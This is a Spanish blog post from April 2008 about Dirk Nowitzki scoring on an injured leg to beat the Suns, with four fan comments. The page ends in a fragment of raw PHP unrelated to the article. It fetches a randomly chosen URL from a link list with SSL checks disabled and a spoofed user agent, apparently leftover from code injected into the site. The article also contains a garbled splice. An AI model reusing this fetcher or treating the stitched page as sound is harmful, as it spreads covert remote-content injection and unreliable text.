Reivindicaciones a la pata coja

07 de April de 2008 por MagicJohnson32

dirkjerseyTres ridículos botes hacia su izquierda y con la palma de la mano para tratar de deshacerse de Amare Stoudemire, un pequeño y agónico impulso hacia atrás con la pierna sana con tal de crearse algo de espacio ante la presión de Boris Diaw, un lanzamiento arqueado… y dos improbables puntos que suben al marcador de los Dallas Mavericks. Quedan 32 segundos para el final del partido y los Mavs ganarán en pista de los Suns gracias a la actuación de Dirk Nowitzki.

A la pata coja.

Lo vimos el viernes en la cancha de los Lakers, donde los texanos no fueron capaces de convertir una temprana renta de 14 puntos en victoria, y lo vimos anoche en Arizona. Nowitzki cojea ostensiblemente pero anota como si nada: 59 puntos en estos dos encuentros. Ante los Suns, además, atrapó 12 rebotes y permaneció en pista 38 minutos.

¿No es tan seria su lesión o se la están jugando los Mavericks? De momento, visto el rendimiento del alemán y los resultados obtenidos, parece que está valiendo la pena, sea cual sea la respuesta a la pregunta. Dallas ha encarrilado su clasificación para los Playoffs gracias a su remontada y gran triunfo en Phoenix, con la colaboración de los tropiezos de Golden State y, especialmente, los Nuggets, que parecen empeñados en irse pronto de vacaciones.

El triunfo de Nowitzki y los Mavs es toda una reivindicación, como parecía insinuar el jugador alemán aljkiddbarbosa estirarse de la camiseta tras anotar su canasta definitiva. No sólo por la importancia y la dificultad de la victoria, sino por algunas de las claves que la hicieron posible. Josh Howard cargó a ratos con el peso ofensivo, Brandon Bass lo hizo casi todo bien en el tiempo que estuvo en cancha y Jason Kidd dio una lección de intangibles, con un fabuloso trabajo defensivo que posibilitó que los Suns estuviesen casi 8 minutos sin anotar y no lograsen más que 9 puntos en todo el último cuarto.

Si las piezas del puzzle de los Mavs acaban por encajar, tenemos otro candidato a todo. Su camino en los Playoffs, en caso de que sellen su pase, se presenta más que tortuoso, empezando por una primera ronda ante Hornets, Lakers o Spurs. Nadie dijo que sería fácil, es lo que tiene la Conferencia Oeste.

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Kobe me fascina, lo de Paul es tremendo, Lebron es una bestia, McGrady parece hacerlo todo fácil y siento una gran admiración por Duncan, pero es que este tio es el mejor!!!!

      Citar

  2. TheDeerHunter dice:
    #2

    Lo de ayer fue verdaderamente emocionante. Épico.
    Dallas paulatinamente está comenzando a mostrar el efecto Kidd. Muchos hemos sido muy críticos con este traspaso… perder a Diop, a Harris por alquien que no mejoraba sustancialmente lo que había.
    Ayer, como el otro día contra LA, Kidd mostró algunos detalles de lo que él aporta. Excelente salida al balón, defensa… Ayer estuvo particularmente paquete en ataque, pero en defensa… uff, para grabar.
    Otro detalle más fue el saludo de Nowitzki en una de las últimas jugadas. Kidd es el hombre que hace que Nowitzki se lo crea, a pesar de todo. Kidd es el nombre que hace que Nowitzki esté jugando cojo su última bala. Y Nowitzki con esa mirada, esa mala leche… es todo un peligro para cualquiera. Igual el nombre de Harris no producía el mismo efecto, sin desmerecerle, por supuesto.
    Después el equipo comienza a entender qué papel tiene cada uno. Brandon Bass pegándose con los dos bicharracos, Dampier pegando a todo cristo, Josh Howard buscando espacios, Terry complementándose con Kidd…
    Ayer fue un partido casi de playoffs contra el prototipo de juego anti-Dallas… y esta vez lo consiguieron.
    Yo digo que hay un nuevo candidato al título con el que ya casi nadie contaba.

      Citar

  3. TheDeerHunter dice:
    #3

    Otra cosa es: ¿qué pasará con la pierna de Nowitzi??
    Yo no había visto nada igual ¿hasta qué punto se está jugando su carrera o es puro teatro??
    Supongo que tendremos que esperar un tiempo para saberlo.

      Citar

  4. Gallis dice:
    #4

    Me gusta el apunte de Deer…probablemente sin Kidd, Nowitzki no estaría forzando…

    Lo de ayer fue sensacional, sencillamente sensacional!!!

    Y hombre, no sé hasta que punto estará arriesgando su carrera, pero tampoco es tan descabellado. Que le pregunten a Hill…ojalá le este echando un poco de cuento, jeje.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>